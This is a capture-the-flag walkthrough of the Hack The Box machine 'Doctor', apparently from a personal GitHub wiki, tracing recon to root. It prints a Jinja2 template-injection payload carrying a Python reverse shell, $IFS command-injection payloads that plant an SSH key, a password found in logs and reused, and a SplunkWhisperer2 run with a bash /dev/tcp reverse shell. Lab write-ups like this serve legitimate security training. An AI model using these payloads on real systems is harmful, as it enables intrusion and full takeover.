HTB Doctor - lmiyasato/lenny-hacking GitHub Wiki
-
nmap, recon scan.
-
Port 8089 - https://10.10.10.209:8089/ Splunk service, admin/changeme doesn't work.
Updated: 2021-02-04T05:35:31+01:00 Splunk build: 8.0.5
Robots.txt: User-agent: * Disallow:
/robots.txt (Status: 200) /services (Status: 401) /v3 (Status: 200) /v2 (Status: 200) /v4 (Status: 200) /v1 (Status: 200)
That has no fruit, moving along
- Note on the main page, there's a “doctors.htb” email address, adding that to the /etc/hosts
The source page shows there is some archive subpage.
<!--archive still under beta testing<a class="nav-item nav-link" href="/archive">Archive</a>-->
Do a view-source on the http://doctors.htb/archive page, it will show it is vulnerable to a SSTI vulnerability
after some dinking around, enter “ {{7*'7'}} / {{5*'5'}} ” in the "new message input field and you get this in the archive view-source page
<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0">
<channel>
<title>Archive</title>
<item><title>${7*7}</title></item>
</channel>
<item><title>49</title></item>
</channel>
<item><title>7777777</title></item>
</channel>
<item><title>7777777 </title></item>
Now you add this in the payload to get your foothold:
{% for x in ().class.base.subclasses() %}{% if "warning" in x.name %}{{x()._module.builtins'import'.popen("python3 -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("10.10.14.52",443)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/bash", "-i"]);'").read().zfill(417)}}{%endif%}{% endfor %}
setup your reverse shell and visit the http://doctors.htb/archive page and get your revshell.
- Webshell via command injection:
put this in the title and content: test title link <script>alert("test")</script>
this shows up after page is submitted:
kali@kali:~$ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.209 - - [06/Feb/2021 17:39:20] code 404, message File not found
10.10.10.209 - - [06/Feb/2021 17:39:20] "GET /title HTTP/1.1" 404 -
Change the payload to: http://10.10.14.52/$(whoami)
kali@kali:~$ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.209 - - [06/Feb/2021 17:45:01] code 404, message File not found
10.10.10.209 - - [06/Feb/2021 17:45:01] "GET /web HTTP/1.1" 404 -
change the payload to: http://10.10.14.52/$(id)
10.10.10.209 - - [06/Feb/2021 17:48:40] code 404, message File not found
10.10.10.209 - - [06/Feb/2021 17:48:40] "GET /uid=1001(web) HTTP/1.1" 404 -
trying to do more complex commands are harder, need to use $IFS to represent space (typical injection technique)
change the payload to:
http://10.10.14.52/$(ping$IFS-c$IFS'3'$IFS'10.10.14.52')
• ping three times to myself
create a .ssh directory within the payload:
http://10.10.14.52/$(mkdir$IFS'/home/web/.ssh')
write a .ssh key within the payload
ssh into server:
kali@kali:~/Documents/HTB/doctor$ ssh -i doctor_rsa [email protected]
- Getting to shaun
after doing a linpeas, this shows interesting: shows that the /var can be read:
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
#
do a grep -r passw . 2>/dev/null
web@doctor:/var/log$ grep -r passw . 2>/dev/null
./auth.log:Feb 7 00:21:48 doctor sudo: pam_unix(sudo:auth): auth could not identify password for [web]
./auth.log.1:Feb 6 18:33:04 doctor VGAuth[666]: vmtoolsd: Username and password successfully validated for root.
./auth.log.1:Feb 6 18:33:05 doctor VGAuth[666]: vmtoolsd: Username and password successfully validated for root.
./auth.log.1:Feb 6 18:33:05 doctor VGAuth[666]: vmtoolsd: Username and password successfully validated for root.
./auth.log.1:Feb 6 18:33:10 doctor VGAuth[666]: vmtoolsd: Username and password successfully validated for root.
./auth.log.1:Feb 6 18:33:10 doctor VGAuth[666]: vmtoolsd: Username and password successfully validated for root.
./auth.log.1:Feb 6 18:33:11 doctor VGAuth[666]: vmtoolsd: Username and password successfully validated for root.
./auth.log.1:Feb 6 18:33:18 doctor VGAuth[666]: message repeated 18 times: [ vmtoolsd: Username and password successfully validated for root.]
./apache2/backup:10.10.14.4 - - [05/Sep/2020:11:17:34 +2000] "POST /reset_password?email=Guitar123" 500 453 "http://doctor.htb/reset_password"
su into shaun, turns out Guitar123 is the password.
- Escalation to root:
Go to https://10.10.10.209:8089/services and authenticate as shaun, will get a lot more functions now.
Apparently the splunkwhisperer will do the trick. Go git clone https://github.com/cnotin/SplunkWhisperer2.git
Run Splunkwhisperer: Open a listener, take root.
kali@kali:~/Documents/HTB/doctor/splunkwhisperer/SplunkWhisperer2/PySplunkWhisperer2$ sudo python3 PySplunkWhisperer2_remote.py --username shaun --password Guitar123 --host 10.10.10.209 --port 8089 --lhost 10.10.14.52 --payload "bash -c bash -i>& /dev/tcp/10.10.14.52/667 0>&1"
Running in remote mode (Remote Code Execution)
[.] Authenticating...
[+] Authenticated
[.] Creating malicious app bundle...
[+] Created malicious app bundle in: /tmp/tmp_mato4yx.tar
[+] Started HTTP server for remote mode
[.] Installing app from: http://10.10.14.52:8181/
10.10.10.209 - - [06/Feb/2021 18:43:50] "GET / HTTP/1.1" 200 -
[+] App installed, your code should be running now!
Press RETURN to cleanup
Setup your listener...
kali@kali:~$ sudo /usr/bin/nc -nvlp 667
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::667
Ncat: Listening on 0.0.0.0:667
Ncat: Connection from 10.10.10.209.
Ncat: Connection from 10.10.10.209:50932.
bash: cannot set terminal process group (1141): Inappropriate ioctl for device
bash: no job control in this shell
root@doctor:/# ls